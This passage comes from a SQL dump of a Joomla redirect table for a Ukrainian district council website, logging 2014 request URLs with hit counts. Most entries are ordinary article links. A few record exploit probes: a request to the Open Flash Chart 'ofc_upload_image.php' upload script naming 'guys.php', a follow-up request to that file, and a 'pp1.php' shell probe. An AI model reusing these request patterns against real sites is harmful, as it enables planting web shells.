00:00:00',301),(4771,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1003:1&Itemid=14&lang=en','','','',1,0,'2014-09-25 10:26:14','0000-00-00 00:00:00',301),(4772,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1001:2013-04-30-12-14-17&lang=en&Itemid=','','','',1,0,'2014-09-25 10:26:15','0000-00-00 00:00:00',301),(4773,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1001:2013-04-30-12-14-17&lang=en','','','',1,0,'2014-09-25 10:26:17','0000-00-00 00:00:00',301),(4774,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1000:1&lang=en&Itemid=','','','',1,0,'2014-09-25 10:26:18','0000-00-00 00:00:00',301),(4775,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1259:1&catid=10:2010-06-05-13-46-44&Itemid=17&lang=uk','','','',8,0,'2014-09-25 10:37:50','0000-00-00 00:00:00',301),(4776,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1015:-200-&catid=11&lang=uk','','','',6,0,'2014-09-25 10:39:29','0000-00-00 00:00:00',301),(4777,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1015:-200-&Itemid=14&lang=en','','','',2,0,'2014-09-25 10:45:51','0000-00-00 00:00:00',301),(4778,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1032:-------l-r--2012-2015-&Itemid=70&lang=en','','','',1,0,'2014-09-25 10:45:54','0000-00-00 00:00:00',301),(4779,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1032:-l-r-2012-2015-&Itemid=92&lang=ru','','','',1,0,'2014-09-25 10:45:58','0000-00-00 00:00:00',301),(4780,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1031:2013-06-17-06-49-26&Itemid=92&lang=uk','','','',1,0,'2014-09-25 10:45:59','0000-00-00 00:00:00',301),(4781,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1021:-l-r&Itemid=92&lang=en','','','',1,0,'2014-09-25 10:46:03','0000-00-00 00:00:00',301),(4782,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1022:-lr-&catid=36:2011-07-21-07-51-53&Itemid=70&lang=uk','','','',4,0,'2014-09-25 10:46:05','0000-00-00 00:00:00',301),(4783,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1259:1&catid=10&Itemid=17&lang=ru','','','',5,0,'2014-09-25 10:55:30','0000-00-00 00:00:00',301),(4784,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1259:1&catid=10&Itemid=17&lang=uk','','','',2,0,'2014-09-25 10:55:39','0000-00-00 00:00:00',301),(4785,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1259:1&catid=10:2010-06-05-13-46-44&Itemid=17&lang=ru','','','',7,0,'2014-09-25 11:14:19','0000-00-00 00:00:00',301),(4786,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1259:1&catid=10:2010-06-05-13-46-44&Itemid=17&lang=uk','','','',5,0,'2014-09-25 11:14:53','0000-00-00 00:00:00',301),(4787,'http://www.malyn-rayrada.org.ua/index.php?Itemid=14&catid=11&id=1035:2013-06-25-09-55-31&lang=uk&option=com_content&view=article','','http://go.mail.ru/search?gp=profitraf4&q=%D1%83%D0%BF%D1%80%D0%B0%D0%B2%D0%BB%D1%96%D0%BD%D0%BD%D1%8F+%D0%B2%D0%B5%D1%82%D0%B5%D1%80%D0%B5%D0%BD%D0%B0','',3,0,'2014-09-25 12:38:05','0000-00-00 00:00:00',301),(4788,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1259:1&catid=10:2010-06-05-13-46-44&Itemid=17&lang=ru','','','',5,0,'2014-09-25 12:42:32','0000-00-00 00:00:00',301),(4789,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1303:2014-04-29-13-13-18&catid=10:2010-06-05-13-46-44&Itemid=17&lang=en','','','',5,0,'2014-09-25 13:04:43','0000-00-00 00:00:00',301),(4790,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1030:2013-06-17-06-46-59&catid=36:2011-07-21-07-51-53&Itemid=70&lang=en','','','',9,0,'2014-09-25 14:35:39','0000-00-00 00:00:00',301),(4791,'http://www.malyn-rayrada.org.ua/components/com_jnews/includes/openflashchart/php-ofc-library/ofc_upload_image.php?name=guys.php','','','',2,0,'2014-09-25 14:45:29','0000-00-00 00:00:00',301),(4792,'http://www.malyn-rayrada.org.ua/components/com_jnews/includes/openflashchart/tmp-upload-images/guys.php?rf','','','',2,0,'2014-09-25 14:45:34','0000-00-00 00:00:00',301),(4793,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1030:2013-06-17-06-46-59&catid=36&Itemid=70&lang=en','','','',7,0,'2014-09-25 14:48:49','0000-00-00 00:00:00',301),(4794,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1095:2013-09-24-13-25-55&catid=11&lang=uk','','','',6,0,'2014-09-25 14:49:27','0000-00-00 00:00:00',301),(4795,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1351:-2014-&catid=59:--20062014-&Itemid=107&lang=ru','','','',13,0,'2014-09-25 14:49:31','0000-00-00 00:00:00',301),(4796,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=924:2013-02-20-19-06-08&catid=11&lang=en','','','',7,0,'2014-09-25 15:06:13','0000-00-00 00:00:00',301),(4797,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1343:2014-06-14-17-26-47&catid=11&Itemid=14&lang=uk','','','',22,0,'2014-09-25 16:05:19','0000-00-00 00:00:00',301),(4798,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1190:------------2014--&catid=36:2011-07-21-07-51-53&Itemid=70&lang=ru','','','',20,0,'2014-09-25 16:24:33','0000-00-00 00:00:00',301),(4799,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1122:-1-&catid=11&Itemid=14&lang=ru','','','',3,0,'2014-09-25 16:25:15','0000-00-00 00:00:00',301),(4800,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1073:2013-08-30-11-12-19&catid=11:2010-06-05-14-33-33&Itemid=14&lang=en','','','',4,0,'2014-09-25 16:25:20','0000-00-00 00:00:00',301),(4801,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1245:2014-03-17-17-23-36&catid=11&lang=uk','','','',6,0,'2014-09-25 16:26:54','0000-00-00 00:00:00',301),(4802,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1235:2014-03-06-13-25-26&catid=11&lang=uk','','','',5,0,'2014-09-25 16:27:43','0000-00-00 00:00:00',301),(4803,'http://malyn-rayrada.org.ua/index.php?option=com_phocagallery&view=category&id=4&Itemid=32&lang=en','','','',7,0,'2014-09-25 16:30:46','0000-00-00 00:00:00',301),(4804,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1132:2013-11-13-10-02-24&catid=11&lang=ru&Itemid=','','','',5,0,'2014-09-25 16:31:04','0000-00-00 00:00:00',301),(4805,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1311:-69-1941-1945-&catid=11&lang=uk','','','',5,0,'2014-09-25 16:31:36','0000-00-00 00:00:00',301),(4806,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1310:2014-05-06-14-07-43&catid=11&lang=en&Itemid=','','','',3,0,'2014-09-25 16:31:49','0000-00-00 00:00:00',301),(4807,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=912:2013-01-22-14-14-06&catid=11&Itemid=14&lang=en','','','',4,0,'2014-09-25 16:33:11','0000-00-00 00:00:00',301),(4808,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1310:2014-05-06-14-07-43&catid=11:2010-06-05-14-33-33&Itemid=14&lang=en','','','',9,0,'2014-09-25 16:34:30','0000-00-00 00:00:00',301),(4809,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1132:2013-11-13-10-02-24&catid=11&lang=ru','','','',5,0,'2014-09-25 16:34:46','0000-00-00 00:00:00',301),(4810,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1069:23--------&catid=11&lang=en&Itemid=0','','','',2,0,'2014-09-25 16:35:36','0000-00-00 00:00:00',301),(4811,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1243:2014-03-17-07-32-47&catid=57:--15042014-&Itemid=98&lang=en','','','',10,0,'2014-09-25 16:35:41','0000-00-00 00:00:00',301),(4812,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=984:-20-&catid=11&lang=en&Itemid=0','','','',4,0,'2014-09-25 16:35:45','0000-00-00 00:00:00',301),(4813,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1165:-2014-&catid=11:2010-06-05-14-33-33&Itemid=14&lang=ru','','','',11,0,'2014-09-25 16:36:09','0000-00-00 00:00:00',301),(4814,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1311:-69-1941-1945-&catid=11&lang=uk','','','',5,0,'2014-09-25 16:36:27','0000-00-00 00:00:00',301),(4815,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1310:2014-05-06-14-07-43&catid=11&lang=en','','','',5,0,'2014-09-25 16:36:28','0000-00-00 00:00:00',301),(4816,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1310:2014-05-06-14-07-43&catid=11&lang=en&Itemid=0','','','',3,0,'2014-09-25 16:37:51','0000-00-00 00:00:00',301),(4817,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=969:-2013-&catid=46:--21122012&Itemid=85&lang=en','','','',3,0,'2014-09-25 16:38:23','0000-00-00 00:00:00',301),(4818,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=936:2013-02-21-09-43-43&catid=47&Itemid=86&lang=en','','','',2,0,'2014-09-25 16:40:26','0000-00-00 00:00:00',301),(4819,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1332:2014-06-04-09-44-02&catid=11&Itemid=14&lang=ru','','','',15,0,'2014-09-25 16:40:50','0000-00-00 00:00:00',301),(4820,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1132:2013-11-13-10-02-24&catid=11&lang=ru&Itemid=','','','',3,0,'2014-09-25 16:44:15','0000-00-00 00:00:00',301),(4821,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=936:2013-02-21-09-43-43&catid=47:--21022013-&Itemid=86&lang=en','','','',2,0,'2014-09-25 16:47:12','0000-00-00 00:00:00',301),(4822,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1122:-1-&catid=11&Itemid=14&lang=uk','','','',6,0,'2014-09-25 16:53:38','0000-00-00 00:00:00',301),(4823,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=936:2013-02-21-09-43-43&catid=47:-21022013-&Itemid=86&lang=en','','','',3,0,'2014-09-25 16:54:12','0000-00-00 00:00:00',301),(4824,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1311:-69-1941-1945-&catid=11&lang=uk&Itemid=','','','',3,0,'2014-09-25 16:57:53','0000-00-00 00:00:00',301),(4825,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=984:-20-&catid=11&lang=en&Itemid=','','','',5,0,'2014-09-25 17:04:53','0000-00-00 00:00:00',301),(4826,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=969:-2013-&catid=46&Itemid=85&lang=en','','','',3,0,'2014-09-25 17:07:44','0000-00-00 00:00:00',301),(4827,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1310:2014-05-06-14-07-43&catid=11&lang=en&Itemid=','','','',4,0,'2014-09-25 17:10:45','0000-00-00 00:00:00',301),(4828,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1310:2014-05-06-14-07-43&catid=11&lang=en&Itemid=0','','','',3,0,'2014-09-25 17:13:52','0000-00-00 00:00:00',301),(4829,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1311:-69-1941-1945-&catid=11&lang=ru','','','',5,0,'2014-09-25 17:20:55','0000-00-00 00:00:00',301),(4830,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1311:-69-1941-1945-&catid=11&lang=ru&Itemid=','','','',2,0,'2014-09-25 17:20:59','0000-00-00 00:00:00',301),(4831,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1311:-69-1941-1945-&catid=11&lang=uk&Itemid=0','','','',2,0,'2014-09-25 17:30:47','0000-00-00 00:00:00',301),(4832,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=984:-20-&catid=11&lang=en&Itemid=0','','','',4,0,'2014-09-25 17:34:06','0000-00-00 00:00:00',301),(4833,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1311:-69-1941-1945-&catid=11&lang=ru&Itemid=0','','','',2,0,'2014-09-25 18:00:14','0000-00-00 00:00:00',301),(4834,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1311:-69-1941-1945-&catid=11&lang=ru&Itemid=','','','',2,0,'2014-09-25 18:00:35','0000-00-00 00:00:00',301),(4835,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1311:-69-1941-1945-&catid=11&lang=uk&Itemid=','','','',6,0,'2014-09-25 18:06:12','0000-00-00 00:00:00',301),(4836,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1296:116---&catid=15:2010-06-06-09-34-01&Itemid=18&lang=uk','','','',19,0,'2014-09-25 18:12:14','0000-00-00 00:00:00',301),(4837,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1267:2014-04-03-21-52-50&catid=11&lang=en&Itemid=','','','',6,0,'2014-09-25 18:15:19','0000-00-00 00:00:00',301),(4838,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1134:-25-6-&catid=11&lang=ru&Itemid=','','','',4,0,'2014-09-25 18:15:36','0000-00-00 00:00:00',301),(4839,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1265:2014-04-01-11-43-46&catid=11&lang=en&Itemid=','','','',4,0,'2014-09-25 18:15:43','0000-00-00 00:00:00',301),(4840,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1296:116---&catid=15:2010-06-06-09-34-01&Itemid=18&lang=ru','','','',8,0,'2014-09-25 18:15:44','0000-00-00 00:00:00',301),(4841,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1277:-2014-&catid=57:--15042014-&Itemid=98&lang=en','','','',13,0,'2014-09-25 18:19:04','0000-00-00 00:00:00',301),(4842,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1287:2014-04-23-06-49-34&catid=10&Itemid=17&lang=en','','','',6,0,'2014-09-25 18:19:18','0000-00-00 00:00:00',301),(4843,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1307:2014-04-30-15-26-52&catid=10:2010-06-05-13-46-44&Itemid=17&lang=uk','','','',14,0,'2014-09-25 18:19:32','0000-00-00 00:00:00',301),(4844,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1267:2014-04-03-21-52-50&catid=11&lang=en&Itemid=0','','','',2,0,'2014-09-25 18:19:39','0000-00-00 00:00:00',301),(4845,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1286:2014-04-23-06-48-27&catid=10&Itemid=17&lang=en','','','',5,0,'2014-09-25 18:19:45','0000-00-00 00:00:00',301),(4846,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1267:2014-04-03-21-52-50&catid=11&lang=en','','','',2,0,'2014-09-25 18:19:50','0000-00-00 00:00:00',301),(4847,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1121:-24-6-&catid=11&lang=ru&Itemid=','','','',2,0,'2014-09-25 18:20:08','0000-00-00 00:00:00',301),(4848,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=896:2013-01-17-07-42-35&catid=47&Itemid=86&lang=uk','','','',1,0,'2014-09-25 18:20:20','0000-00-00 00:00:00',301),(4849,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1171:2014-01-11-09-58-40&catid=11&lang=ru&Itemid=','','','',4,0,'2014-09-25 18:20:23','0000-00-00 00:00:00',301),(4850,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1216:-q-q&catid=11&Itemid=14&lang=en','','','',12,0,'2014-09-25 18:20:26','0000-00-00 00:00:00',301),(4851,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1121:-24-6-&catid=11&lang=ru&Itemid=0','','','',5,0,'2014-09-25 18:20:40','0000-00-00 00:00:00',301),(4852,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1114:-lr-&catid=53&Itemid=94&lang=ru','','','',8,0,'2014-09-25 18:25:21','0000-00-00 00:00:00',301),(4853,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=978:-6612-&catid=11&lang=ru&Itemid=0','','','',2,0,'2014-09-25 18:26:17','0000-00-00 00:00:00',301),(4854,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1325:2014-05-29-06-00-31&catid=11&Itemid=14&lang=ru','','','',8,0,'2014-09-25 18:27:05','0000-00-00 00:00:00',301),(4855,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1265:2014-04-01-11-43-46&catid=11&lang=en&Itemid=0','','','',2,0,'2014-09-25 18:31:25','0000-00-00 00:00:00',301),(4856,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1265:2014-04-01-11-43-46&catid=11&lang=en','','','',2,0,'2014-09-25 18:31:32','0000-00-00 00:00:00',301),(4857,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1325:2014-05-29-06-00-31&catid=11:2010-06-05-14-33-33&Itemid=14&lang=ru','','','',10,0,'2014-09-25 18:31:54','0000-00-00 00:00:00',301),(4858,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1325:2014-05-29-06-00-31&catid=11:2010-06-05-14-33-33&Itemid=14&lang=uk','','','',7,0,'2014-09-25 18:32:00','0000-00-00 00:00:00',301),(4859,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1096:2013-09-24-13-34-16&catid=53:--25102013-&Itemid=94&lang=en','','','',7,0,'2014-09-25 18:42:14','0000-00-00 00:00:00',301),(4860,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1267:2014-04-03-21-52-50&catid=11&lang=en&Itemid=','','','',5,0,'2014-09-25 18:48:28','0000-00-00 00:00:00',301),(4861,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1267:2014-04-03-21-52-50&catid=11&lang=en&Itemid=0','','','',2,0,'2014-09-25 18:50:09','0000-00-00 00:00:00',301),(4862,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1265:2014-04-01-11-43-46&catid=11&lang=en&Itemid=','','','',3,0,'2014-09-25 18:50:59','0000-00-00 00:00:00',301),(4863,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1296:116---&catid=15:2010-06-06-09-34-01&Itemid=18&lang=uk','','','',4,0,'2014-09-25 18:53:18','0000-00-00 00:00:00',301),(4864,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1096:2013-09-24-13-34-16&catid=53&Itemid=94&lang=en','','','',3,0,'2014-09-25 18:54:51','0000-00-00 00:00:00',301),(4865,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=978:-6612-&catid=11&lang=ru&Itemid=','','','',1,0,'2014-09-25 18:55:03','0000-00-00 00:00:00',301),(4866,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=978:-6612-&catid=11&lang=ru&Itemid=0','','','',3,0,'2014-09-25 18:58:08','0000-00-00 00:00:00',301),(4867,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1265:2014-04-01-11-43-46&catid=11&lang=en&Itemid=0','','','',3,0,'2014-09-25 19:03:27','0000-00-00 00:00:00',301),(4868,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1300:2014-04-25-07-21-54&catid=11&Itemid=14&lang=en','','','',8,0,'2014-09-25 19:18:04','0000-00-00 00:00:00',301),(4869,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1296:116---&catid=15:2010-06-06-09-34-01&Itemid=18&lang=ru','','','',7,0,'2014-09-25 19:21:02','0000-00-00 00:00:00',301),(4870,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1325:2014-05-29-06-00-31&catid=11&Itemid=14&lang=uk','','','',9,0,'2014-09-25 19:26:46','0000-00-00 00:00:00',301),(4871,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1185:2014-01-28-09-38-54&catid=56&Itemid=97&lang=ru','','','',6,0,'2014-09-25 19:26:51','0000-00-00 00:00:00',301),(4872,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1096:2013-09-24-13-34-16&catid=53:--25102013-&Itemid=94&lang=en','','','',2,0,'2014-09-25 19:45:26','0000-00-00 00:00:00',301),(4873,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1195:2014-01-28-13-01-27&catid=36:2011-07-21-07-51-53&Itemid=70&lang=ru','','','',17,0,'2014-09-25 19:45:37','0000-00-00 00:00:00',301),(4874,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1199:-l-r-&catid=56&Itemid=97&lang=en','','','',7,0,'2014-09-25 19:57:01','0000-00-00 00:00:00',301),(4875,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1057:--22072013--2100-&catid=11&lang=ru&Itemid=0','','','',2,0,'2014-09-25 19:57:15','0000-00-00 00:00:00',301),(4876,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1325:2014-05-29-06-00-31&catid=11:2010-06-05-14-33-33&Itemid=14&lang=ru','','','',4,0,'2014-09-25 19:59:43','0000-00-00 00:00:00',301),(4877,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1124:2013-10-30-08-05-10&catid=11&lang=ru','','','',5,0,'2014-09-25 20:04:35','0000-00-00 00:00:00',301),(4878,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=884:2012-12-24-10-46-13&catid=11&lang=en&Itemid=0','','','',5,0,'2014-09-25 20:05:04','0000-00-00 00:00:00',301),(4879,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1129:2013-11-06-13-36-25&catid=11&lang=ru&Itemid=0','','','',3,0,'2014-09-25 20:05:13','0000-00-00 00:00:00',301),(4880,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1110:-9-2013-&catid=11&lang=ru&Itemid=','','','',2,0,'2014-09-25 20:05:17','0000-00-00 00:00:00',301),(4881,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1370:31-&catid=11&Itemid=14&lang=ru','','','',5,0,'2014-09-25 20:05:47','0000-00-00 00:00:00',301),(4882,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1369:--lr----&catid=11&Itemid=14&lang=ru','','','',5,0,'2014-09-25 20:07:45','0000-00-00 00:00:00',301),(4883,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=975:-2012-2015-&catid=49:--12042013-&Itemid=88&lang=en','','','',11,0,'2014-09-25 20:11:09','0000-00-00 00:00:00',301),(4884,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1199:-l-r-&catid=56:--03022014-&Itemid=97&lang=en','','','',4,0,'2014-09-25 20:11:36','0000-00-00 00:00:00',301),(4885,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=979:2013-03-29-09-18-27&catid=11:2010-06-05-14-33-33&Itemid=14&lang=en','','','',4,0,'2014-09-25 20:15:28','0000-00-00 00:00:00',301),(4886,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1218:2014-02-21-15-02-18&catid=11&Itemid=14&lang=en','','','',4,0,'2014-09-25 20:15:41','0000-00-00 00:00:00',301),(4887,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1130:2013-11-07-14-04-12&catid=11:2010-06-05-14-33-33&Itemid=14&lang=uk','','','',6,0,'2014-09-25 20:15:44','0000-00-00 00:00:00',301),(4888,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=999:2013-04-28-05-21-05&catid=11&lang=en','','','',2,0,'2014-09-25 20:15:46','0000-00-00 00:00:00',301),(4889,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=910:-22-&catid=11&lang=ru&Itemid=0','','','',3,0,'2014-09-25 20:15:47','0000-00-00 00:00:00',301),(4890,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=910:-22-&catid=11&lang=uk&Itemid=0','','','',4,0,'2014-09-25 20:19:38','0000-00-00 00:00:00',301),(4891,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1130:2013-11-07-14-04-12&catid=11&Itemid=14&lang=ru','','','',4,0,'2014-09-25 20:33:31','0000-00-00 00:00:00',301),(4892,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=954:--19-----6-&catid=11&Itemid=14&lang=en','','','',3,0,'2014-09-25 20:44:20','0000-00-00 00:00:00',301),(4893,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=976:2013-03-21-18-42-06&catid=11:2010-06-05-14-33-33&Itemid=14&lang=uk','','','',4,0,'2014-09-25 20:44:27','0000-00-00 00:00:00',301),(4894,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=954:-19-6-&catid=11:2010-06-05-14-33-33&Itemid=14&lang=en','','','',3,0,'2014-09-25 20:44:29','0000-00-00 00:00:00',301),(4895,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1130:2013-11-07-14-04-12&catid=11:2010-06-05-14-33-33&Itemid=14&lang=uk','','','',3,0,'2014-09-25 20:50:45','0000-00-00 00:00:00',301),(4896,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=910:-22-&catid=11&lang=ru&Itemid=','','','',4,0,'2014-09-25 20:52:05','0000-00-00 00:00:00',301),(4897,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=910:-22-&catid=11&lang=uk&Itemid=0','','','',2,0,'2014-09-25 21:07:28','0000-00-00 00:00:00',301),(4898,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=976:2013-03-21-18-42-06&catid=11:2010-06-05-14-33-33&Itemid=14&lang=ru','','','',3,0,'2014-09-25 21:10:36','0000-00-00 00:00:00',301),(4899,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=954:-19-6-&catid=11&Itemid=14&lang=en','','','',7,0,'2014-09-25 21:14:39','0000-00-00 00:00:00',301),(4900,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=976:2013-03-21-18-42-06&catid=11:2010-06-05-14-33-33&Itemid=14&lang=ru','','','',3,0,'2014-09-25 21:41:24','0000-00-00 00:00:00',301),(4901,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=918:-2013-2015-&catid=36:2011-07-21-07-51-53&Itemid=70&lang=ru','','','',21,0,'2014-09-25 21:47:28','0000-00-00 00:00:00',301),(4902,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1130:2013-11-07-14-04-12&catid=11:2010-06-05-14-33-33&Itemid=14&lang=ru','','','',4,0,'2014-09-25 21:55:48','0000-00-00 00:00:00',301),(4903,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1092:2013-09-19-12-18-37&catid=36:2011-07-21-07-51-53&Itemid=70&lang=ru','','','',15,0,'2014-09-25 23:22:19','0000-00-00 00:00:00',301),(4904,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1038:2013-06-28-10-19-47&catid=11&lang=uk&Itemid=0','','','',2,0,'2014-09-26 00:22:35','0000-00-00 00:00:00',301),(4905,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1038:2013-06-28-10-19-47&catid=11&lang=ru&Itemid=0','','','',2,0,'2014-09-26 00:51:27','0000-00-00 00:00:00',301),(4906,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1038:2013-06-28-10-19-47&catid=11&lang=uk&Itemid=','','','',1,0,'2014-09-26 00:51:33','0000-00-00 00:00:00',301),(4907,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=957:199-&catid=11&Itemid=14&lang=uk','','','',11,0,'2014-09-26 01:05:43','0000-00-00 00:00:00',301),(4908,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1038:2013-06-28-10-19-47&catid=11&lang=ru','','','',2,0,'2014-09-26 01:20:08','0000-00-00 00:00:00',301),(4909,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1110:-9-2013-&catid=11&lang=ru','','','',4,0,'2014-09-26 01:54:26','0000-00-00 00:00:00',301),(4910,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1117:--------l-r----&catid=53&Itemid=94&lang=en','','','',4,0,'2014-09-26 02:02:15','0000-00-00 00:00:00',301),(4911,'http://malyn-rayrada.org.ua/administrator/components/com_contact/pp1.php','','','',1,0,'2014-09-26 